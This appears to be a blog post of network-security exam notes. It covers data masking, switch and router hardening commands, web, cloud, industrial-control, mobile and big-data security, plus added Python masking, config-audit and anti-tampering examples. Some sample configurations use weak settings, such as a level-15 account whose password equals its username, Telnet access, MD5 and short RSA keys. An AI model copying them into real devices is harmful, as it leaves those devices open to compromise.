Common data desensitization techniques include shielding, deformation, replacement, randomization, and encryption, to prevent sensitive data from being leaked to unauthorized users or systems. For example, assume that the item identification data is as follows:
4346 6454 0020 5379
4493 9238 7315 5787
4297 8296 7496 8724
After desensitization by replacement, the item identification data becomes the following form:
4346 XXXX XXXX 5379
4493 XXXX XXXX 5787
4297 XXXX XXXX 8724
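The replacement shown above, together with two of the other listed techniques, fits in one short module. The following is an added example, not part of the original notes: replacement keeps the first and last four digits, randomization substitutes random digits in the same format, and a keyed hash (HMAC-SHA256, this example's choice for a transformation that still lets records be matched) produces a stable token. The key and the function names are constructed for this example.

```python
import hashlib
import hmac
import secrets

# The three identifiers used in the text above.
SAMPLES = ["4346 6454 0020 5379", "4493 9238 7315 5787", "4297 8296 7496 8724"]

DEMO_KEY = b"constructed-demo-key"   # placeholder; a real key lives in a key store


def _middle_positions(value, keep_head, keep_tail):
    """Indexes of the digits that must not be revealed."""
    idx = [i for i, c in enumerate(value) if c.isdigit()]
    if len(idx) <= keep_head + keep_tail:
        return idx                   # too short: hide every digit
    return idx[keep_head:len(idx) - keep_tail]


def mask_replace(value, keep_head=4, keep_tail=4, fill="X"):
    """Replacement: middle digits become `fill`, separators are preserved."""
    chars = list(value)
    for i in _middle_positions(value, keep_head, keep_tail):
        chars[i] = fill
    return "".join(chars)


def mask_randomize(value, keep_head=4, keep_tail=4):
    """Randomization: middle digits become random digits, format unchanged."""
    chars = list(value)
    for i in _middle_positions(value, keep_head, keep_tail):
        chars[i] = str(secrets.randbelow(10))
    return "".join(chars)


def pseudonymize(value, key=DEMO_KEY):
    """Keyed transformation: the same identifier always gives the same token,
    so masked tables can still be joined, but the token cannot be inverted
    without the key."""
    digits = "".join(c for c in value if c.isdigit())
    return hmac.new(key, digits.encode(), hashlib.sha256).hexdigest()[:16]


if __name__ == "__main__":
    for v in SAMPLES:
        print(mask_replace(v), mask_randomize(v), pseudonymize(v))
```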

21. Switch security:


Switch security enhancement
1. Turn off unnecessary network services
2. Create a local account
3. Enable SSH service
4. Restrict secure remote access
5. Restrict console access
6. Enable login security check
7. Security audit
8. Restrict SNMP access
9. Safely save the switch IOS software image file
10. Close unnecessary ports
11. Close the console and monitoring audit
12. Warning information

SSH configuration method:
[H3C]public-key local create rsa
# Generate the RSA key pair
The range of public key modulus is (512 ~ 2048).
If the key modulus is greater than 512, it will take a few minutes.
Press CTRL+C to abort.
Input the modulus length [default = 1024]:
Generating Keys…
Create the key pair successfully.

[H3C]ssh server enable
// Enable the SSH service
[H3C]line vty 0 4
[H3C-line-vty0-4]authentication-mode scheme
[H3C-line-vty0-4]protocol inbound ssh
[H3C-line-vty0-4]quit

Huawei SSH configuration:
[Huawei]rsa local-key-pair create // Generate the RSA key
The key name will be: Huawei_Host
The range of public key size is (512 ~ 2048). // Press Enter; the default size is 512
NOTES: If the key modulus is greater than 512,
it will take a few minutes.
Input the bits in the modulus[default = 512]:
Generating keys…
…++++++++++++
…++++++++++++
…++++++++
…++++++++

[Huawei]user-interface vty 0 4
[Huawei-ui-vty0-4]authentication-mode aaa
[Huawei-ui-vty0-4]protocol inbound ssh
[Huawei]ssh user huawei // Create the ssh user huawei
[Huawei]ssh user huawei authentication-type password // Set the authentication method of ssh user huawei to password
[Huawei]aaa
[Huawei-aaa]local-user huawei password cipher huawei // Set the password of local user huawei to huawei
[Huawei-aaa]local-user huawei privilege level 15 // Set the privilege level of local user huawei to 15 (the highest privilege)
[Huawei-aaa]local-user huawei service-type ssh // Set the service type of local user huawei to ssh
[Huawei]ssh user huawei service-type stelnet // Set the service type of ssh user huawei to stelnet

[Huawei]stelnet server enable // Enable the stelnet service

What are the security threats to switches:
MAC address flooding: a large number of forged MAC addresses are sent to the switch, so that its MAC address table reaches its upper limit and it can no longer work with normal MAC addresses.

Network management generally includes configuration management, performance management, security management, fault management, etc. in terms of functions.

ARP viruses are divided into three categories: ARP gateway spoofing, ARP man-in-the-middle attack, and ARP flooding.
ARP spoofing: the attacker sends false ARP messages in response to the initiating target host to perform address spoofing.

Password threats: weak passwords, clear text transmission of passwords, etc.

Vulnerability exploitation: denial of service attack, unauthorized access, information leakage, call hijacking.

OSPF security authentication has three authentication methods: interface authentication, area authentication, and virtual link authentication.

APT (Advanced Persistent Threat): intelligence collection, defense breakthrough, channel establishment, lateral penetration, information collection and external communication

2. Router security threats:

Secure storage of router passwords:
The router first uses MD5 to hash the administrator password information, and then saves it to the router configuration file.

Remote secure access to the router: Telnet is commonly used to access the router remotely, but Telnet can easily leak sensitive password information. Therefore, to strengthen the security management of the router, administrators use SSH in place of Telnet.
OSPF authentication
North# config t
Enter configuration commands, one per line. End with CNTL/Z.
North(config)# router ospf 1
North(config-router)# network 14.1.x.y 0.0.255.255 area 0
North(config-router)# area 0 authentication message-digest
North(config-router)# exit
North(config)# int eth0/1
North(config-if)# ip ospf message-digest-key 1 md5 routes-4-all

1) Enable authentication for the OSPF routing protocol
Router(Config)# router ospf 100
Router(Config-router)# network 192.168.100.0 0.0.0.255 area 100
! Enable MD5 authentication.
! area area-id authentication enables authentication, which is plaintext password authentication.
! area area-id authentication message-digest
Router(Config-router)# area 100 authentication message-digest
Router(Config-router)# exit
Router(Config)# interface eth0/1
! Enable the MD5 key; the key is routerospfkey.
! ip ospf authentication-key key enables the authentication key, but it is transmitted in clear text.
! ip ospf message-digest-key key-id(1-255) md5 key
Router(Config-if)# ip ospf message-digest-key 1 md5 routerospfkey

Only RIP-V2 supports authentication; RIP-V1 does not. It is recommended to enable RIP-V2 and use MD5 authentication. Ordinary authentication is also transmitted in clear text.
Router# config terminal
! Set up the key chain
Router(Config)# key chain mykeychainname
Router(Config-keychain)# key 1
! Set the key string
Router(Config-keychain-key)# key-string MyFirstKeyString
Router(Config-keychain)# key 2
Router(Config-keychain-key)# key-string MySecondKeyString
! Enable RIP-V2
Router(Config)# router rip
Router(Config-router)# version 2
Router(Config-router)# network 192.168.100.0
Router(Config)# interface eth0/1
! Use MD5 mode authentication and select the configured key chain
Router(Config-if)# ip rip authentication mode md5
Router(Config-if)# ip rip authentication key-chain mykeychainname

Unicast reverse-path verification checks the accuracy of source IP addresses, thereby preventing certain kinds of IP spoofing. But it can only be used on routers with CEF (Cisco Express Forwarding) enabled.
Router# config t
! Enable CEF
Router(Config)# ip cef
! Enable Unicast Reverse-Path Verification
Router(Config)# interface eth0/1
Router(Config-if)# ip verify unicast reverse-path

When a user accesses the router, he or she must be authenticated before being allowed in. The user names and passwords of a router are configured as follows.
Central# config t
Enter configuration commands, one per line. End with CNTL/Z.
Central(config)# username rsmith password 3d-zirc0nia
Central(config)# username rsmith privilege 1
Central(config)# username bjones password 2B-or-3B
Central(config)# username bjones privilege 1

enable password is a global command that restricts access to privileged mode.
If you only configure enable password + password, for example with the password set to 123, you must enter the password 123 to enter privileged mode. If you configure enable secret class, the password you must enter to enter privileged mode is class; enable secret + password stores the password in encrypted form.
When enable password + password and enable secret + password are both set, the enable secret password replaces the enable password password.

The process of setting the Console password is as follows:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password console-password

The password authentication configuration of the network device for the Console, AUX and VTY passwords is as follows:
line con 0
password console-password
login
line aux 0
password aux-password
login
line vty 0 4
password vty-password
login

TACACS authentication:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#aaa new-model
Router(config)#tacacs-server host X.Y.Z.10
Router(config)#tacacs-server key MyTACACSkey
Router(config)#aaa authentication login default group tacacs+ local
Router(config)#line aux 0
Router(config-line)#login authentication default
Router(config-line)#exit
Router(config)#line vty 0 4
Router(config-line)#login authentication default
Router(config-line)#^Z

Now take a router that uses RADIUS to authenticate VTY access as an example. The IP address of the RADIUS server is X.Y.Z.5, and the server's key is MyRADIUSkey. The configuration process is as follows:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#aaa new-model
Router(config)#radius-server host X.Y.Z.5
Router(config)#radius-server key MyRADIUSkey
Router(config)#aaa authentication login default group radius local
Router(config)#line con 0
Router(config-line)#login authentication default
Router(config-line)#exit
Router(config)#line vty 0 4
Router(config-line)#login authentication default
Router(config-line)#^Z

Console port access control:
Router(Config)#Access-list 1 permit X.Y.Z.1
Router(Config)#line con 0
Router(Config-line)#Transport input none
Router(Config-line)#Login local
Router(Config-line)#Exec-timeout 5 0
Router(Config-line)#access-class 1 in
Router(Config-line)#end

VTY access control:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#access-list 10 permit X.Y.Z.12
Router(config)#access-list 10 permit X.Y.Z.5
Router(config)#access-list 10 deny any
Router(config)#line vty 0 4
Router(config-line)#access-class 10 in
Router(config-line)#^Z

The timeout limit is configured as follows:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#service tcp-keepalives-in
Router(config)#line vty 0 4
Router(config-line)#exec-timeout 5 0
Router(config-line)#^Z

HTTP authentication configuration:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#ip http authentication type
Router(config)#^Z
Router#
Here, type can be set to enable, local, tacacs or aaa.

SNMP configuration:
(1) Set the community string for read-only SNMP access mode.
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#snmp-server community UnGuessableStringReadOnly RO
Router(config)#^Z

Restrict telnet:
Only the host with the IP address X.Y.Z.6 is allowed to access the Telnet service of the router.
Router(config)#access-list 99 permit X.Y.Z.6 log
Router(config)#access-list 99 deny any log
Router(config)#line vty 0 4
Router(config-line)#access-class 99 in
Router(config-line)#exec-timeout 5 0
Router(config-line)#login local
Router(config-line)#transport input telnet
Router(config-line)#exec
Router(config-line)#end

In view of the potential operational security risks of switches and routers, these devices provide a permission classification mechanism in which each permission level corresponds to different operational capabilities. In Cisco network equipment, permissions are divided into 16 levels from 0 to 15, with 0 being the lowest level and 15 being the highest level. The higher the level, the more operating permissions. The specific configuration is as follows:
Router>show privilege
Current privilege level is 1
Router>enable 5
Password: level-5-password
Router#show privilege
Current privilege level is 5
Router#

Cisco SSH configuration:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname RouterOne
RouterOne(config)#ip domain-name mydomain.com
RouterOne(config)#crypto key generate rsa
The name for the keys will be: RouterOne
Choose the size of the key modulus in the range of 360 to 2048 for your
General Purpose Keys. Choosing a key modulus greater than 512 may take
a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys…
[OK]
RouterOne(config)#ip ssh time-out 60
RouterOne(config)#ip ssh authentication-retries 2
RouterOne(config)#line vty 0 4
RouterOne(config-line)#transport input ssh
RouterOne(config-line)#^Z

Vulnerability exploitation: denial of service attacks, unauthorized access, information leakage, call hijacking, security bypass.
Password security threats: weak passwords, clear-text transmission of passwords, etc.
Routing protocol security threats: malicious routing protocol packets that cause routing service errors.
DoS/DDoS: exploiting TCP/IP protocol vulnerabilities to carry out denial of service attacks.
Dependency threats: destroying the router's operating environment so that the router operates abnormally.

Technical methods to increase router security
• Upgrade the operating system and apply patches promptly
• Turn off unnecessary network services
1. Disable CDP
2. Disable other TCP/UDP small services
3. Disable the Finger service
• Explicitly disable unused ports
• Disable IP directed broadcast and source routing
• Enhance router VTY security
• Block malicious data packets
• Router password security
• Transmission encryption
• Enhance router SNMP security
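The vty, timeout and SNMP settings from the transcripts above can be checked automatically against a saved configuration. The following auditor is an added example, not code from the original notes; the sample configuration, the 192.0.2.12 address, the function names and the list of "guessable" community strings are assumptions made for illustration.

```python
import re

# Constructed sample running-config (not from the page). "line vty 0 4" follows
# the page's ACL / timeout / SSH settings; "line vty 5 15" is left weak.
SAMPLE_CONFIG = """\
service tcp-keepalives-in
snmp-server community public RO
access-list 10 permit 192.0.2.12
access-list 10 deny any
line con 0
 exec-timeout 5 0
 login local
line vty 0 4
 access-class 10 in
 exec-timeout 5 0
 transport input ssh
 login authentication default
line vty 5 15
 exec-timeout 0 0
 transport input telnet ssh
"""

# Assumption of this example: community strings treated as guessable.
WEAK_COMMUNITIES = {"public", "private"}


def parse_config(config):
    """Return (global commands, {"line ..." header: [its sub-commands]})."""
    global_cmds, line_blocks, current = [], {}, None
    for raw in config.splitlines():
        cmd = raw.strip()
        if not cmd or cmd == "!":
            continue
        if raw[0].isspace():            # indented: belongs to the open block
            if current is not None:
                line_blocks[current].append(cmd)
            continue
        if cmd.startswith("line "):
            current = cmd
            line_blocks[current] = []
        else:                           # any other top-level command
            current = None
            global_cmds.append(cmd)
    return global_cmds, line_blocks


def audit(config):
    """List deviations from the hardening settings shown in the notes."""
    findings = []
    global_cmds, line_blocks = parse_config(config)
    if "service tcp-keepalives-in" not in global_cmds:
        findings.append("global: service tcp-keepalives-in is missing")
    for cmd in global_cmds:
        m = re.match(r"snmp-server community (\S+)", cmd)
        if m and m.group(1).lower() in WEAK_COMMUNITIES:
            findings.append(f"snmp: guessable community string '{m.group(1)}'")
    for header, cmds in line_blocks.items():
        timeout = next((c.split()[1:] for c in cmds
                        if c.startswith("exec-timeout ")), None)
        if timeout is not None and all(int(n) == 0 for n in timeout):
            findings.append(f"{header}: exec-timeout 0 0 disables the idle timeout")
        if not header.startswith("line vty"):
            continue
        if not any(re.match(r"access-class \S+ in$", c) for c in cmds):
            findings.append(f"{header}: no inbound access-class")
        transport = next((c.split()[2:] for c in cmds
                          if c.startswith("transport input ")), None)
        if transport != ["ssh"]:
            findings.append(f"{header}: transport input not explicitly restricted to ssh")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

The second vty range is the point of the sample: a device often has more vty lines than 0 to 4, and settings applied only to `line vty 0 4` leave the rest unprotected.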

3. Two authentication mechanisms for network devices:
RADIUS steps:
The aaa new-model command enables AAA.
The radius-server host command specifies the RADIUS server.
The radius-server key command sets the key shared with the RADIUS server.
Define the default AAA authentication method, with local authentication as a backup.
Configure the lines to use the AAA authentication method.

RADIUS runs over UDP; the authentication and authorization port is 1812, and the accounting port is 1813.

TACACS+ steps:
aaa new-model enables AAA.
tacacs-server host specifies the TACACS+ server.
tacacs-server key sets the key shared with the TACACS+ server.
Define the default AAA authentication method, with local authentication as a backup.
Configure the lines to use the AAA authentication method.

4. There are two methods for secure communication between network equipment and management workstations: SSH and VPN.
SSH: For remote access security, network equipment provides an SSH service to replace insecure Telnet. The configuration steps are as follows:
hostname specifies the device name.
ip domain-name configures the device domain.
crypto key generate rsa generates the RSA encryption keys. The recommended minimum key size is 1024 bits.
ip ssh sets the SSH access parameters.
The transport input command configures the lines to use SSH.

The performance requirements for IPsec VPN are stated for Ethernet frames of 64 bytes and 1428 bytes respectively.

IPsec VPN: If the network device supports IPsec, the communication between the management workstation and the network device can be encrypted in transit. The main configuration steps are as follows:
create an IKE security proposal; use an ACL to capture the traffic of interest; associate the IKE security proposal and establish the IKE peer; create an IPsec security proposal; create an IPsec security policy and associate all of the above with it; apply the IPsec security policy to the device interface and determine the direction.
Out-of-band access does not rely on other networks, while in-band access requires network support.
The console port is the default access method and requires physical access to the network device. The AUX port provides out-of-band access: it can be connected to the network device through a terminal server or modem, so that administrators can access the device remotely.

Code Execution. This type of vulnerability allows attackers to control network equipment, causing the network system to lose control, which is extremely harmful. CVE-2000-0945 indicates that the web configuration interface of Cisco Catalyst 3500 XL switches allows remote attackers to execute arbitrary commands without authentication.

Overflow. Exploitation of this type of vulnerability can lead to denial of service, privilege escalation, or security bypass. CVE-2006-4650 shows that Cisco IOS 12.0, 12.1, and 12.2 handle GRE IP improperly, resulting in an integer overflow. An attacker can inject specially constructed packets into the routing queue, thereby bypassing the router's ACLs.

Memory Corruption. Exploits of memory corruption vulnerabilities often cause denial of service on routers. CVE-2010-0576 shows that Cisco IOS 12.4 improperly handles Multi Protocol Label Switching (MPLS) packets, allowing remote attackers to send malicious packets that interfere with the operation of the affected Cisco network equipment, causing a denial of service.

22. (Key points) Website security has the following main aspects: confidentiality, integrity, availability, and controllability.

There are two main kinds of web vulnerabilities:
Technical security vulnerabilities: vulnerabilities caused by improper technical handling, such as SQL injection, cross-site scripting (XSS), and malicious file execution.
Business logic security vulnerabilities: vulnerabilities caused by insufficient consideration of process security in the business logic.

Website security threats mainly include:
unauthorized access, web page tampering, data leakage, malicious code, website counterfeiting, denial of service, and threats to website backend management security.

OWASP is an international open web application security organization; its OWASP Top 10 lists the top 10 web vulnerabilities.

Credential stuffing: using account and password information obtained elsewhere to attempt logins against the current target.

Common web denial-of-service attacks: UDP flood, ICMP flood, SYN flood, HTTP flood

2. Apache web security threats:
Apache software configuration threats: directory indexing, resource location prediction, information leakage.
Apache software program threats: buffer overflow.
Apache web security mechanism threats: password brute-force cracking, password authorization errors, weak passwords.
Apache application threats: SQL injection attacks, input validation error vulnerability attacks.
Apache communication threats: Apache generally transmits HTTP in clear text.
Apache service content threats: web page tampering, phishing.
Apache denial of service attacks: DDoS exhausts resources.

Delete files that are not used by Apache by default:
Apache source code files
Default HTML files
CGI program examples
Default user files

3. IIS security mechanism: IIS authentication, IIS access control, IIS audit

IIS supports multiple authentication methods, mainly including the following:
• Anonymous Authentication. When other authentication measures are missing, anonymous authentication is implemented.
• Basic Authentication, providing basic authentication services.
• Certificate Mapping Authentication, implements certificate authentication based on Active Directory.
• Digital signature authentication (Digest Authentication), implements digital signature authentication.
• IIS Certificate Mapping Authentication, which implements certificate authentication based on IIS configuration.
• Windows Authentication, integrated (NTLM) authentication.

IIS security threats:
Unauthorized access: obtaining special permissions through IIS configuration errors or system vulnerabilities.
Network worms: buffer overflow vulnerabilities, such as the Code Red network worm attack.
Web page tampering: modifying the content of IIS web pages.
Denial of service attacks: DDoS exhausts resources.
IIS software vulnerabilities: XSS attacks, code execution, overflow, privilege escalation, memory corruption, information leakage and other attacks.

IIS security enhancement:
install IIS patches promptly,
enable dynamic IIS restrictions,
enable URLScan,
enable the IIS application firewall,
enable the SSL service

4. Injection attacks: SQL injection, NoSQL injection, OS injection, LDAP injection.
Web services generally adopt a three-tier architecture model: browser + Web server + database

5. The second-level website must be evaluated every two years, and the third-level website must be evaluated once a year.

When accessing the Internet, in order to prevent malicious code in Web pages from damaging your computer, the preventive measure you can take is to allocate the Web sites you want to visit to different security zones of the browser according to their credibility.
There are 4 zones, the default is the internet zone, and the other 3 are local zone, trusted zone, and restricted zone.

In principle, the information security level of government websites should not be lower than level two. Level 3 websites should be assessed once a year, and level 2 websites should be assessed every two years.

There are two main types of website anti-tampering technologies:
one is to use the operating system's file call events to detect changes in the integrity of web page files and so prevent the website from being modified without authorization;
the other is to use cryptographic one-way functions to detect whether the website's files have been changed. If it is detected that a web page has been illegally modified, the web page recovery mechanism is started and automatically replaces the damaged page with a normal page file.
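The second technique (one-way function plus automatic recovery) can be sketched as follows. This is an added example, not code from the original notes; SHA-256 as the one-way function, the directory names and the function names are assumptions, and the temporary web root in demo() is constructed sample data.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def file_digest(path):
    """SHA-256 of a file, read in chunks so large files are handled."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map each file path (relative to root) to its digest.
    In production the baseline is stored where the web server cannot write."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): file_digest(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def detect_changes(root, baseline):
    """Compare the live web root with the trusted baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(f for f in baseline
                           if f in current and current[f] != baseline[f]),
        "missing": sorted(f for f in baseline if f not in current),
        "unexpected": sorted(f for f in current if f not in baseline),
    }


def restore(root, backup, baseline, changes):
    """Replace modified or missing pages with the backup copy, but only if
    the backup copy itself still matches the baseline digest."""
    root, backup = Path(root), Path(backup)
    restored = []
    for rel in changes["modified"] + changes["missing"]:
        src = backup / rel
        if src.is_file() and file_digest(src) == baseline[rel]:
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(src, root / rel)
            restored.append(rel)
    return restored  # unexpected files are reported, not deleted


def demo():
    """Constructed scenario: one page changed, one removed, one file added."""
    with tempfile.TemporaryDirectory() as tmp:
        web, backup = Path(tmp, "webroot"), Path(tmp, "backup")
        web.mkdir()
        (web / "index.html").write_text("<h1>Welcome</h1>")
        (web / "about.html").write_text("<p>About us</p>")
        shutil.copytree(web, backup)
        baseline = build_baseline(web)
        (web / "index.html").write_text("<h1>Changed without authorization</h1>")
        (web / "about.html").unlink()
        (web / "extra.php").write_text("<?php /* file not in baseline */ ?>")
        changes = detect_changes(web, baseline)
        restored = restore(web, backup, baseline, changes)
        return changes, restored, detect_changes(web, baseline)


if __name__ == "__main__":
    for part in demo():
        print(part)
```

Files that appear without being in the baseline are left in place for investigation, since the notes only describe replacing damaged pages.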

23. (Key points) According to management and technical requirements, the cloud data center requires:
one center: the security management center;
triple protection: secure computing environment, secure area boundary, and secure communication network.

IT resources are provided in the form of services: Infrastructure as a Service (IaaS), Platform as a Service (PaaS), Software as a Service (SaaS), Data as a Service (DaaS), Storage as a Service (STaaS)

Cloud computing technology security requirements
1. Cloud security requirements analysis – ensuring that cloud users can obtain trusted cloud services
(1) Cloud user identification and authentication
(2) Cloud user resource access control
(3) Cloud user data secure storage
(4) Cloud equipment and service software security
2. Network security communication requirements analysis – ensuring the security of cloud users' timely access to cloud services and online data. Technologies include: identity authentication, key distribution, data encryption, channel encryption, firewall, VPN, anti-denial of service
3. Cloud computing platform security requirements analysis – ensuring the security, trustworthiness and business continuity of cloud services, mainly including: physical environment security, host server security, operating system security, database security, application and data security, cloud operating system security, virtual machine security, and multi-tenant security isolation

24. 2. Disaster recovery and backup for the cloud data center adopts the "two locations, three centers" solution:
two locations: same city and remote location;
three centers: production center, same-city disaster recovery center, and remote disaster recovery center.

Cloud computing is the development and application of distributed computing, parallel computing, and grid computing technologies.

25. (Key points) For industrial control systems, the order of the security attributes is reversed: availability, integrity, confidentiality.

Security threat analysis of industrial control systems: natural disasters and environment, internal security threats, equipment functional safety failures, malicious code, and network attacks

Industrial control system security risks: industrial control protocol security, industrial control system technology product security vulnerabilities, industrial control system basic software security vulnerabilities, industrial control system algorithm security vulnerabilities, industrial control system equipment firmware vulnerabilities, industrial control system open access vulnerabilities, industrial control system supply chain security

Industrial control system security protection mechanisms and technologies: physical and environmental security protection, security zoning and boundary protection, identity authentication and access control, remote access security, malicious code prevention, data security, network security detection and emergency response, security management

4. Industrial control systems are generally divided into discrete manufacturing and process control. Malicious code poses the greatest threat to industrial control systems, for example the Stuxnet virus and the Flame virus.

The full name of the "Flame" virus is Worm.Win32.Flame. It is a backdoor program and Trojan horse, and it also has the characteristics of a worm. As long as the operator behind it gives instructions, it can replicate itself on the Internet and on mobile devices. Once a computer system is infected, the virus starts a series of complex actions, including monitoring network traffic, taking screenshots, recording audio conversations, and intercepting keyboard input. Flame is considered to be the largest and most complex network attack virus ever discovered. It can replicate and spread through USB memory devices and networks. Once the task of collecting data is completed, it can also destroy itself without leaving a trace. It can also use the infected computer as a "beacon" to discover devices transmitting via Bluetooth and provide the operator behind it with status information about the malicious programs implanted in the device.

Stuxnet is a worm whose level of sophistication far exceeds the capabilities of the average computer hacker. It was first detected in June 2010 and was the first worm specifically designed to attack real-world infrastructure (energy) facilities, such as nuclear power plants, dams, and the national power grid, which has concerned Internet security experts. Stuxnet exploited four previously undiscovered vulnerabilities in Microsoft's Windows operating system. Criminal hackers typically exploit such vulnerabilities to steal bank and credit card information for illegal income. Unlike such malware, Stuxnet makes no money and costs money to develop, which is one reason why experts believe that it originated from intelligence services. The virus adopts a variety of advanced techniques, so it is extremely stealthy and destructive. As soon as a computer operator inserts an infected USB flash drive into a USB port, the virus takes control of some industrial computer systems without anyone noticing (no other action is required and no prompt appears).

The security strategy of the power monitoring system is: security partition, network dedicated, horizontal isolation, and vertical authentication.

5. The components of industrial control systems: SCADA system, distributed control system (DCS), process control system (PCS), programmable logic controller (PLC), remote terminal (RTU), CNC machine tools and CNC systems.

PLC mainly executes various operations, sequence control, timing and other instructions to control the actions of industrial production equipment. It is the basic unit of industrial control system.

Master Terminal Unit (MTU): MTU is the abbreviation of Master Terminal Unit. The MTU is generally deployed in the dispatch control center, is mainly used for information collection and monitoring of the production process, and maintains communication with the RTU through the network.

Remote Terminal Unit (RTU): RTU is the abbreviation of Remote Terminal Unit. The RTU is mainly used for information collection, automatic measurement recording and transmission in the production process, and maintains communication with the MTU through the network.

Human-Machine Interface (HMI): HMI is the abbreviation of Human-Machine Interface. The HMI is a software and hardware platform that provides the operation interface and data communication between the operator and the controller. At present, industrial control systems mainly use computer terminals for human-computer interaction.

Industrial control communication networks connect the various industrial control devices and components. Traditional industrial communication networks are generally built on dedicated protocols and form a closed network. Common industrial control-specific protocols include OPC, Modbus, DNP3, etc. Industrial communication network types include the DCS main control network, the SCADA remote network, the on-site control level communication network, etc. With the application and development of Internet technology, TCP/IP protocols are gradually being applied to industrial control systems, such as smart equipment, smart buildings, smart factories and other control systems.

Mobile operating system platform security threats
• Wireless network attacks
• Malicious code
• Mobile application code reverse engineering
• Illegal tampering of mobile applications

Mobile application APP security reinforcement: anti-decompilation, anti-debugging, anti-tampering, anti-theft

6. The Android system architecture is divided into: Linux kernel layer, system runtime layer, application framework layer, and application layer.
Application framework layer: Using the program signature mechanism, all software installed on the mobile phone has a digital certificate to verify the security of the software.
System runtime library layer: Use the sandbox mechanism to enable applications and the corresponding running Dalvik virtual machines to run in independent Linux process spaces and not intersect with other applications to achieve complete isolation.

Permissions at the application layer include normal permissions, dangerous permissions, signature permissions, and signatureOrSystem permissions:
normal permissions will not cause substantial harm to users.

dangerous permissions may bring potential threats to users, such as reading user location information or reading the phone book. For such security threats, most mobile phones currently remind users when they install applications.

signature permission means that only applications with the same signature can access.

signatureOrSystem permissions are mainly used by equipment vendors.

7. Android system security mechanism:
Network communication encryption: Supports the use of SSL/TLS for encrypted data transmission.

Kernel security mechanism: controlled by partitions and Linux ACL permissions.

Security mechanisms of the Android system by layer:
Application layer: permission declaration mechanism.
Application framework layer: application signing mechanism.
System runtime layer: security sandbox, network communication security (SSL).
Kernel layer: file system security, SELinux.

8. Apple iOS system architecture: core operating system layer, core service layer, media layer, and touchable layer.
iOS system security mechanism: The security architecture of the iOS platform can be divided into hardware, firmware, and software.

iOS security mechanisms:
secure boot chain,
sandbox mechanism,
address space randomization,
code signing,
data encryption

Mobile office mainly faces the following risks:
• Loss of equipment. Someone who controls a lost device can access the corporate intranet, steal corporate confidential data, and destroy backend systems.
• Information leakage. Sensitive data stored on local devices is lost or stolen, resulting in information leakage.
• Malicious attacks. Malicious programs are implanted to conduct intrusion attacks on organizational servers.
• Shared access. Employees share devices and account passwords, leaking organizational confidential information.

Common mobile application (App) network security detection contents are as follows:
• Identity authentication mechanism detection;
• Communication session security mechanism detection;
• Sensitive information protection mechanism detection;
• Log security policy detection;
• Transaction process security mechanism detection;
• Server authentication mechanism detection;
• Access control mechanism detection;
• Data tamper resistance detection;
• SQL injection prevention capability detection;
• Anti-phishing security capability detection;
• App security vulnerability detection.


Mobile app security hardening:
anti-decompilation,
anti-debugging,
anti-tampering,
anti-theft

9. Characteristics of big data: massive data, rapid data flow, diverse data types, and data value density.

Big data security protection technology: digital signature technology is used for data authenticity, hash algorithm is used for data integrity, and encryption algorithm is used to protect the confidentiality of big data.

10. Big data business authorization is based on role-based access authorization technology.

The country has promulgated regulations, policies and standards such as the "Information Security Technology Personal Information Security Specifications" (implemented on October 1, 2020). For privacy protection, the main technologies include data identity anonymization, data differential privacy, data desensitization, data encryption, data access control, etc.

11. Big data security control:
Before data processing: evaluate the authenticity, legality, business secrets, etc. of the data source.

Data processing: multi-tenant isolation control, unified metadata management, data desensitization control, unified access monitoring and auditing.

After data processing: data security control, data encryption platform services.

Data compliance testing:

Big data security threats:
• The security boundaries of "data sets" are becoming increasingly blurred, making security protection more difficult
• Increased security risk of sensitive data leakage
• Security risks of data distortion and big data pollution
• Business continuity and denial of service of big data processing platforms
• Personal data is widely distributed across multiple data product backends, making privacy protection more difficult
• Data transaction security risks
• Big data abuse

Big data security requirements analysis:
• Big data's own security - authenticity, real-time, confidentiality, integrity, availability, traceability
• Big data security compliance - meeting data security policies and regulations
• Big data cross-border security
• Big data privacy protection
• Big data processing platform security
• Big data business security
• Big data operation security

…over

Origin blog.csdn.net/ydaxia110/article/details/121616543